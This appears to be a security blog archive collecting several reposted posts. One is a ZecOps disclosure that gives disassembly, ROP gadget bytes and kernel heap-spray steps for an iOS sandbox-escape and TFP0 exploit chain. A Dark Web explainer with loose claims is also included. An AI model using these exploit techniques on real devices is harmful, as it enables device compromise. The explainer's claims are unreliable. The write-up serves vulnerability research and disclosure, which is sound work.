Monthly Archives: November 2019

[VIDEO] How Veracode Leverages AWS to Eliminate AppSec Flaws at Scale

Veracode???s SaaS-native platform has scanned more than 10 trillion lines of code for security defects ??? that breaks down to more than 4 million applications, with 1 million of those scanned in the last year alone. By scanning in the Veracode platform, our customers benefit from the convenience of running programs, not systems, and developers free up much-needed processing power so they can continue writing code without any obstacles.

To deliver application security solutions with speed and accuracy at scale, Veracode needs massive computing power. Follow along as Veracode???s EMEA CTO, Paul Farrington, explains how the Veracode platform leverages Amazon Web Services to solve some of the hardest problems facing organizations today ??? securing software in an ever-changing digital landscape.

ツ?

The Dark Web: What You Need to Know

Despite its negative connotations, the Dark Web is nothing to be afraid of. Few know that the Dark Web was actually thought out as a means of preserving privacy and security. However, this also enabled it to become a breeding ground for illegal activity.

There are certainly things to be distrustful of when navigating the Dark Web, and before venturing into it head-first, you should understand certain things about it.

What is the Dark Web?

The first thing you need to know is that there is no actual database for the Dark Web. Instead, there are only what are known as “peer to peer connections”, which means that the data you are accessing is not stored in just one place.

Instead, it is found on thousands of different computers that are part of the network, so that no one can actually identify where the information is coming from. You can upload to the network, but when downloading, there is no telling where you’re getting the data from.

Why do people use the Dark Web?

There are all kinds of uses for the dark web. Some of them are downright nefarious; others, not so much.

  • Drug sales

Taking into consideration the anonymous nature of the Dark Web, it was only a matter of time before it came into use to sell illegal drugs. It is the ideal avenue for this kind of transaction, because of the anonymity factor that is inherent to the Dark Web.

  • Illegal commerce

To say that you can buy anything on the Dark Web would be an understatement. Anything you can imagine, no matter how gruesome, can be purchased on the Dark Web, from guns to stolen data to organs.

  • Child porn

Is it really a surprise that child porn is rampant on the Dark Web? It’s one of the darker aspects of it, but the anonymous nature of it does lend itself to concealing horrible realities like this.

  • Communication

For all its negative connotations and activities, the Dark Web can also be a way to foster open communication that can sometimes save lives or make a change. Especially in cases where governments monitor online activity, having a place to speak out freely can be invaluable.

  • Reporting

The Dark Web can be used as an excellent source for journalists because sources can remain anonymous. Additionally, no one can track their activity, so it cannot attract consequences from authorities.

How to access

You may be wondering how you can access the Dark Web – after all, you can’t just Google it or access it in a regular browser.

Here are some of the aspects you need to keep in mind about accessibility, including the browser you need to use, the URLs, personal credentials you may need, and even acceptable currency, should you decide to make a purchase.

  • TOR browser

The most common way to access the Dark Web is via The Onion Router (TOR), the browser used by most people for this purpose. This ensures that your identity will remain concealed, as will your activity, because it encrypts everything.

You can obtain the TOR browser by downloading it from the official website. It’s as easy as installing it and running it like any normal program. And if you were worried about the legality of it – have no fear.

Both accessing the Dark Web and downloading the means to do so are entirely legal. While this can enable some pretty dark human behavior, it can also give us very necessary freedom to do positive things, as you will see. Not everyone uses it for nefarious purposes.

  • Exact URLs

Something that makes it difficult to navigate the Dark Web is the fact that the pages are not indexed by browsers. That means that anything you may be looking for will require an exact URL. That does limit the amount of people who can access the Dark Web, as well as the scope of the pages one can gain access to.

Unless you know exactly where to look, you may not have a lot of luck finding what you want. That can deter you from searching, or on the contrary, it can determine you to go looking for someone who is well versed in illegal activity and who can help you out.

  • Criminal activity

It comes as no surprise that the Dark Web is a hotbed of criminal activity. No one is advocating that one pick up criminal undertakings in order to use the Dark Web. But generally speaking, the people who will most likely be looking to access URLs here are people who are engaged in all manner of criminal activity.

  • Bitcoin

All transactions on the Dark Web are completed via Bitcoin, as this type of currency cannot be traced. That increases the degree of safety of the transaction, both for buyers and for sellers.

However, that does not mean that these transactions are always safe. There is a high degree of uncertainty that accompanies these transactions, regardless of what you are purchasing.

You might find that the person you are buying from is a scammer who can end up taking your money, but not sending over your product. While identities are protected, transactions are not, so a degree of care is always necessary.

The future of the Dark Web

While authorities are always making efforts to cut down on the number of sites present on the Dark Web, more are always created. In the end, it proves to be a bit of a wasted effort. The more websites get shut down, the more pop up in their place.

Does that mean that the Dark Web will continue in perpetuity? No one can say with any degree of certainty. It is entirely possible that people will seek refuge in the anonymity of the Dark Web as the degree of surveillance grows, or the opposite can happen and we can grow to accept surveillance as a means of ensuring a thin veneer of security.

Conclusion

The Dark Web will always be controversial, but it’s not nearly as scary as it seems. It’s true that it certainly conceals some illegal and immoral behavior, but it can also be used for good. The anonymous and untraceable aspects of it help it remain a somewhat neutral space where one can find the freedom to communicate, investigate, search, trade, make purchases, etc.

 

 

The post The Dark Web: What You Need to Know appeared first on CyberDB.

FIDL: FLARE’s IDA Decompiler Library

IDA Pro and the Hex Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the HexRays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback.  For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order nodes are visited in, is not always obvious based on the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The amount of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object FIDL will parse the AST for us and provides a high-level summary of a function using information extracted via the decompiler including APIs called, their parameters, and a summary of local variables and parameters for the function.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the HexRays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress malware commonly manually revolves needed imports by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports looking for pre-computed values. As an analyst being able to quickly or automatically map these functions to their intended API makes it easier for us to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which fixes this by reducing the amount of low-level details an analyst needs to understand in order to create a script leveraging the decompiler and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

After 1 Million of Analyzed Samples

One year ago I decided to invest in static Malware Analysis automation by setting up a full-stack environment able to grab samples from common opensources and to process them by using Yara rules. I mainly decided to offer to cybersecurity community a public dataset of pre-processed analyses and let them be “searchable” offering PAPI and a simple visualization UI available HERE. Today after one year is time to check how the project grown and see its running balance.

How it works

Malware Hunter is a python powered project driven by three main components: collectors, processors and public API. The collector takes from public available sources samples and place them in a local queue waiting to be processed. The processors are multiple single python processes running on a distributed environment which pulling samples from the common queue, process them and saves back to a mongodb instance the whole processed result-set. Unfortunately I cannot store all the analyzed samples due to the storage price which would rise quite quickly, so I manly collect only “reports”: a.k.a what the processor has analyzed. Public API (if you want access to them, please write me) are used to query the mongodb and for submitting new samples. Finally a simple user interface is provided for getting some statistics over time. A periodic task looks for specific matched Yara rules which stands for APT and populates a specific view available HERE. In other words if it finds a match on a well-known Yara rule built to catch Advanced Persistent Threats, it collects the calculated hash and through a dedicated API visualizes stats and matching signatures of all potential APT found. Everything runs without human interaction, and this is good and bad as well. It is good since it can scale up very quickly (depending on the acquired power on the VPS) but on the other hand by having no human interaction, depending on the implementation of Yara rules, the system can have many false positives. BUT what is interesting to me is having a base set of samples from which starting on. Without such a kind of tool, how would you start finding specific threats ? In that specific case I can start from the one matched the specific signature related to the specific threat I want to follow, rather than starting randomly.

Findings

After almost one year of fully automated static analyzed samples through Yara rules, Malware Hunter analyzed more than one Million samples, distributed in the following way.

Malware Analyses Distribution

It looks like on April 2019 the engine extracted and analyzed a small set of samples if compared to the general trend, while on late August / first of September it analyzed more than 250k samples. It is interesting to see a significant increase of analyses at the “end of the year” if compared to the analyses performed at the beginning of the same year. While malware collectors collect the same sources over the past year, the engine analyzes only specific file types (such as for example PE and Office files) and assuming the sample sources had not working breaks, it can mean that:

  • More non-in-scope samples have been spread over the time frame between April to June such as for example: HTML, Javascript, VBA etc.. or
  • Malware flow is subject to cyclical trends depending on a multiple topics including political influences and fiscal years.

Observing the most snapped Yara rules it is nice to check that the most analyzed samples were executable files. Many of them (almost 400k) hid a PE file compressed and/or encrypted into themselves.

TOP Matched Rules

Many Yara matches highlight an high presence of anti-debugging techniques, for example: DebuggerTiming_Ticks, DebuggerPatterns_SEH_Inits, Debugger_Checks and isDebuggerPresent, and so on and so forth. If considered together with Create_Process, Embedded_PE and Win_File_Operations bring the analyst to think that modern malware is heavily obfuscated and weaponized against debuggers. From signatures such as: keyloggers and screenshots it’s clear that most of the nowadays malware is recording our keyboard activities and wants to spy on us by getting periodical screenshots. The presence of HTTP and TCP rules underline the way new malware keep getting online either for downloading shellcodes (signature shellcode) and to ask to be controlled from a C2 system (such as a sever). Many samples look like they open-up a local communication port which often hides a local proxy for encrypt communication between the malware and its command and control. Crafted Mutex are very frequent for Malware developers, they are used to delay or to manage the multi infection processes.

Equation Group Signature Matches

Another interesting observation comes fron the way Equation Group Toolset matches.

The Equation Group, classified as an advanced persistent threat, is a highly sophisticated threat actor suspected of being tied to the Tailored Access Operations (TAO) unit of the United StatesNational Security Agency (NSA).[1][2][3]Kaspersky Labs describes them as one of the most sophisticated cyber attack groups in the world and “the most advanced … we have seen”, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame.

From Wikipedia

Many EquationGroup_toolset signatures matched during the most characterized detection time frame (at the beginning and at the ending of the year) alerting us that those well-known (August 2016) tools are still up and running and heavily reused over samples. ShadowBrokers released the code on August 2016 and from that time many piece of malware adopted it, still nowadays looks like be actual in many executable samples.

From the slow but interesting page “potential APT detection” (available HERE) we have “live” stats (updated every 24h) on APT matches over the 1 Million analyzed samples. Dragonfly (As Known As Energetic Bear) is what the Malware Hunter mostly matched. According to MalPedia DragonFly is a Russian group that collects intelligence on the energy industry, followed by Regin. According to Kaspersky Lab’s findings, the Regin APT campaign targets telecom operators, government institutions, multi-national political bodies, financial and research institutions and individuals involved in advanced mathematics and cryptography. The attackers seem to be primarily interested in gathering intelligence and facilitating other types of attacks.

Most APT Signature Metches

Many Ursnif/Gozi were detected during the past year. Ursnif/Gozi is a quite (in)famous banking trojan targeting UK/Italy mostly, and attribute to the cybercrime group TA-505 from TrendMicro in late 2018 by spotting common evidences between Ursnif/Gozi and TA-505 banking trojans such as Dridex and the loader Emotet. Interesting to note that quite old rules related to Putter Panda hit in some samples (for example: 1b1c4bc8d5f32b429eac590ec94b1a0780eaf863db99674decb6b6bd9abdf979 and ef046640438ab22d0168017aa75f7137f7a94e30e9f2f16cd65596d0a95a75d2, ...). Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). The analysis on the found results might go further, but if you are interesting in getting into some details please do not hesitate to contact me, or to use the search field on that page.

Used Infrastructure

While the scrapers and the workers run in remote and domestic PCs, the PAPI server holds both: Public Application Program Interface and the searching scripts (the ones used to match and to alert for specific API matches). The following graphs show the VP usage at a glance.

Server Usage

4 CPUs at 100% most of time. CPUs are used to process Yara rules to build-up DataBase views, to filtering out unwanted samples (for example HTML, Javascript and so on..), for searching and alerting on interesting samples and for periodically enrich pre-calculated reports by adding additional information over time. Disk is mostly used for storing temporary files on separate queues before being processed. The used instance of MongoDB is not hosted on the same machine. The network graph is used to track network load balance between Bytes sent and Bytes received. Almost 2.0Mbps incoming network is the lower bound-rate while 300Kbps is the average on out-bound. This means collectors are grabbing a nice number of new samples per day from public available sources and they push the new samples on the central queue as well. On the other hand PAPI usage looks like taking a lower outbound rate. It makes sense since the PAPI Json result for single request is is way lighter than the sample itself represented from the request.

I hope you enjoy that tool, as usual feel free to search on samples, to use them to classify your TI and if you need PAPI let me know. I am planning to let it run unless the cost will increase too much for me.

ZecOps Task-For-Pwn 0 Bounty: TFP0 POC on PAC-Enabled iOS Devices

ZecOps Task-For-Pwn 0 Bounty: TFP0 POC on PAC-Enabled iOS Devices

Summary

In September we announced “Task For Pwn 0 (TFP0): Operation #FreeTheSandbox”.  In this blogpost we are delighted to announce that we have successfully obtained TFP0 for both non-PAC and PAC devices.  Presently, we are releasing a TFP0 POC code on PAC enabled devices to empower users to independently verify the integrity of their own devices.

Since the release of CheckM8, users can independently verify their devices’ integrity on non-PAC devices. However, PAC-enabled device owners are still restricted by iOS sandbox which inhibits full analysis of their own devices. 

Presently only PAC-enabled iOS devices cannot be inspected, hence we are no longer offering bounties for non PAC-enabled devices. At the same time, we have extended additional bounties to Boot Rom vulnerabilities and generic Local Privilege Escalations (LPEs) for Android devices, ideally, boot level LPEs.You can read more about our updated bounties for iOS (A12/A13), and Android in the following  blog post: Checkm8 Implications on iOS DFIR, TFP0, #FreeTheSandbox, Apple, and Google

Technical Summary

This blog provides an overview of an exploitation technique to bypass Pointer Authentication Code (PAC) which was introduced on all iOS devices since A12. This blog will focus on CVE-2019-8797, CVE-2019-8795 and CVE-2019-8794. The remainder of this report provides additional details about PAC bypass on iOS <= 12.4.2.

For more information regarding the vulnerability that is possible to trigger and exploit on iOS devices with no PAC capability, please refer to this article. We would like to thank 08Tc3wBB for this submission. 

Bounty: For this exploit chain, for both regular as well as non-PAC devices, we provided $35,000 in bounties.

Userspace Exploit

The published exploit describes how to achieve sandbox escape by exploiting CVE-2019-8797 of MIDIServer.

Following is the disassembly code from MIDIIORingBufferWriter::EmptySecondaryQueue on non-PAC devices. The published exploit is able to hijack the PC register by controlling the value of x8 in the highlighted line by exploiting CVE-2019-8797.

bool MIDIIORingBufferWriter::EmptySecondaryQueue(MIDIIORingBufferWriter *this) 
                stp         	x28, x27, [sp,#-0x10+var_50]!
                stp         	x26, x25, [sp,#0x50+var_40]
                stp         	x24, x23, [sp,#0x50+var_30]
                stp         	x22, x21, [sp,#0x50+var_20]
                stp         	x20, x19, [sp,#0x50+var_10]
                stp         	x29, x30, [sp,#0x50+var_s0]
                add         	x29, sp, #0x50
                mov         	x21, x0
                mov         	x19, x0 
                ldr         	x8, [x19,#0x58]!
                ldr         	x8, [x8,#0x10]
                mov         	x0, x19
                blr         	x8 // PC control

However, on the devices with PAC, the instruction “ldraa” loads pointer with pointer authentication, which means that we need to pass an address with proper authentication to x8.

bool MIDIIORingBufferWriter::EmptySecondaryQueue(MIDIIORingBufferWriter *this)
	         pacibsp
	         sub	sp, sp, #0x70
	         stp	x28, x27, [sp, #0x10]
	         stp	x26, x25, [sp, #0x20]
	         stp	x24, x23, [sp, #0x30]
	         stp	x22, x21, [sp, #0x40]
	         stp	x20, x19, [sp, #0x50]
	         stp	x29, x30, [sp, #0x60]
	         add	x29, sp, #0x60
	         mov	x19, x0 
	         add	x0, x0, #0x58    
	         str	x0, [sp]
	         ldr	x8, [x19, #0x58] // <-- x8 point to a controlled memory, with A-key encrypted
	         ldraa	x9, [x8, #0x10]! 
	         movk	x8, #0x165d, lsl #48
	         blraa	x9, x8 // PC control

Trying ROP without stripping the PAC pointer, triggers the following crash on the target process:

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x002000029f000010 -> 0x000000029f000010 (possible pointer authentication failure)
VM Region Info: 0x29f000010 is in 0x280000000-0x2a0000000;  bytes after start: 520093712  bytes before end: 16777199
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      unused shlib __TEXT    00000001dd1f8000-00000001dd998000 [ 7808K] r--/r-- SM=COW  ... this process
      GAP OF 0xa2668000 BYTES
--->  MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
      UNUSED SPACE AT END

This concept of PAC bypassing is derived from Ian Beer’s post. Let’s take a look at the document to see how “ldraa” works:

Load Register, with pointer authentication. This instruction authenticates an address from a base register using a modifier of zero and the specified key, adds an immediate offset to the authenticated address, and loads a 64-bit doubleword from memory at this resulting address into a register.

Key A is used for LDRAA, and key B is used for LDRAB.

Since the instruction “ldraa” uses the A-family keys which are shared between all processes, we are able to authenticate the addresses we have controlled using pac* instructions. The example below demonstrates how we can use the “pacdza” instruction to authenticate a data pointer that will pass the “ldraa”.

uint64_t PACSupport_pacdza(uint64_t data_ptr){
    
    const char *unused_fmt = "";
    printf(unused_fmt, data_ptr);
    __asm__ __volatile__("mov %0, x8"
                         ::"r"(data_ptr));
    __asm__ __volatile__(
                         "pacdza    x8\n"
                         "mov %0, x8\n"
                         :"=r"(data_ptr));
    return data_ptr;
}

After gaining initial PC Control, we still need to control other registers for arbitrary code execution. At this point, x0 contains a pointer that points to a memory we control, which is also A-key encrypted. 

When the targeted pointer is encrypted, normal instructions like “ldr“, “ldp” will trigger a crash.

Now, we need to strip code authentication for those registers. Following gadgets are used to strip the registers we need:

Gadget_doubleJump:
    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]
    0x09, 0x3D, 0x20, 0xF8, // ldraa  x9, [x8, #0x18]!
    0x48, 0x15, 0xEE, 0xF2, // movk   x8, #0x70aa, lsl #48
    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8      // Jmp to Gadget_strip_x0
    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]    // Now x0 is fully under control
    0xE8, 0x3B, 0xC1, 0xDA, // autdza x8
    0x09, 0x01, 0x40, 0xF9, // ldr    x9, [x8]
    0xA8, 0x39, 0xFF, 0xF2, // movk   x8, #0xf9cd, lsl #48
    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8

Gadget_strip_x0:
    0x00,0x00,0x40,0xF9, // ldr x0, [x0]   // Reset x0, now point to memory under our control
    0xE0,0x47,0xC1,0xDA, // xpacd  x0      // Remove PAC from it
    0xC0,0x03,0x5F,0xD6, // ret

Gadget_control_x0x2:
    0xF3, 0x03, 0x00, 0xAA, // mov    x19, x0
    0x08, 0x00, 0x42, 0xA9, // ldp    x8, x0, [x0, #0x20]
    0x61, 0x3A, 0x40, 0xB9, // ldr    w1, [x19, #0x38]
    0x62, 0x1A, 0x40, 0xF9, // ldr    x2, [x19, #0x30]
    0x1F, 0x09, 0x3F, 0xD6, // blraaz x8

After controlling PC, X0 and X2, we are able to call xpc_array_apply_f with x0 pointing to a crafted fake xpc array. Afterwards, the function pointer is called each time in a loop with a controllable x2 register:

By pointing the function pointer to IODispatchCalloutFromMessage and making each element of the fake xpc_array to point to a fake mach message matching the format expected by IODispatchCalloutFromMessage, it is possible to chain together an arbitrary number of basic function calls.

There are limitations compared to regular ROP, however this is sufficient to achieve the goal including opening up a kernel surface to proceed to kernel exploit.

Kernel Exploit

Kernel PAC does not affect the information disclosure bug, hence KASLR can be bypassed. 

In the published exploit, the PC is controlled by hijacking vtable in the line with a comment (a). Since we are not be able to use JOP due to PAC, we need another primitive for PAC bypass.

Let’s take a look at the AppleAVE2Driver::DeleteMemoryInfo function from another angle, emphasising that we have full control of *memInfo.

__int64 AppleAVE2Driver::DeleteMemoryInfo(AppleAVE2Driver *this, IOSurfaceBufferMngr **memInfo)
{
  [...]
 
  if ( memInfo )
  {
    if ( *memInfo )
    {
      v8 = destroy_iosurfaceinfo_buf(*memInfo); //(a) Hijack PC
      operator delete(v8);  // (b) Potentially leads to arbitrary memory release
    }
    memset(memInfo, 0, 0x28uLL);
    result = 0LL;
  }
 [...]
  return result;
}

__int64 __fastcall destroy_iosurfaceinfo_buf(__int64 a1)
{
  __int64 this; // x19

  this = a1;
  remove_buffer(a1);
  return this;
}

Following is the code that is called by destroy_iosurfaceinfo_buf. We can avoid triggering code execution by setting the value of some of the offsets (e.g. 0x28, 0x30 and 0x20 etc.) to 0 in order to control the pointer passed to “operator delete”  (see comment (b)). In this way, we turn this vulnerability into another powerful primitive – Arbitrary Memory Release.

__int64 __fastcall remove_buffer(__int64 a1)
{
  __int64 v1; // x19
  __int64 v2; // x2
  __int64 v3; // x0
  __int64 v4; // x0
  __int64 result; // x0
  __int64 v6; // x1
  __int64 v7; // x1

  v1 = a1;
  sub_FFFFFFF00691D958();
  if ( *(_QWORD *)(v1 + 0x28) && *(_QWORD *)(v1 + 0x68) && *(_QWORD *)(v1 + 0x50) ) //bypass
  {
    v2 = *(_QWORD *)(v1 + 0x48);
    sub_FFFFFFF006922108();
  }
  v3 = *(_QWORD *)(v1 + 0x30);
  if ( v3 ) //bypass
  {
    (*(void (**)(void))(*(_QWORD *)v3 + 0x28LL))();
    *(_QWORD *)(v1 + 0x30) = 0LL;
  }
  v4 = *(_QWORD *)(v1 + 0x28);
  if ( v4 ) //bypass
  {
    (*(void (**)(void))(*(_QWORD *)v4 + 0xD8LL))();
    (*(void (**)(void))(**(_QWORD **)(v1 + 40) + 40LL))();
    *(_QWORD *)(v1 + 40) = 0LL;
  }
  result = *(_QWORD *)(v1 + 0x20);
  if ( result ) //bypass
  {
   [...]
  }
  return result;

With this primitive, we can now use the strategy introduced in BlackHat USA 2019 by TieLei Wang and Hao Xu.

1. Spray OSdata that has the size of a page (0x4000), after spraying a large volume of OSdata, it’s not hard to predict the address of one of the OSdata. The predicted_address allows us to construct the OSdata which contains the fake ipc_port_struct and task_struct for leaking addresses of kernel_map and ipc_space_kernel in the following steps.

Noteworthy, OSata uses kmem_alloc instead of kmem_alloc_kobject while request size is equal or greater than page_size(0x4000), since kmem_alloc allocates data outside of kernel_object. we need to shrink spray_data_len to 0x3FFF.

+----------+----------+----------+----------+----------+
|  OSDATA  |  OSDATA  |  OSDATA  |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

2. Trigger vulnerability to release the OSdata at predicted_address.

+----------+----------+----------+----------+----------+
|  OSDATA  |  OSDATA  |  FREE    |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

3. Send ool_ports descriptor of the same size as the free’d OSdata to ourselves, to fill up that hole.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  | MACH_MSG |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

4. Release filled data by using iosurface, so that the memory that holds ool_ports is released.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  |   FREE   |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

5. Re-spray the OSdata with fake ipc objects to get control of ipc port structure. 

Please note that at this point we still couldn’t build a fake tfp0 due to not knowing the addresses of kernel_map and ipc_space_kernel.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  |FAKE PORTS|  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

6. Receive these ports which are translated from in-kernel ipc port structure that we have controlled in the previous step. Next, the fake ipc_port_struct and task_struct that was sprayed in step 1 is used for kernel info leak in order to read values from kernel memory with these fake ports, via pid_for_task.

Now, we have all the addresses required to build fake TFP0 ports.

7. Release and spray with the OSdata which contains fake TFP0 port while the ool_ports pointer still pointing to a fake ipc_port_struct. TFP0 achieved!

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |
+----------+----------+----------+----------+----------+

Proof of Concept

The POC below is released for research purposes only. Use at your own risk. The POC is available here: https://github.com/ZecOps/public/tree/master/ZecOps_FreeTheSandbox_iOS_PAC_TFP0_POC_BEQ_12_4_2

References

Bonus

If you read all the way till here – here’s a bonus:
To receive #FreeTheSandbox stickers delivered to you, fill this form

task_for_pwn@zecops.com public key below:

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
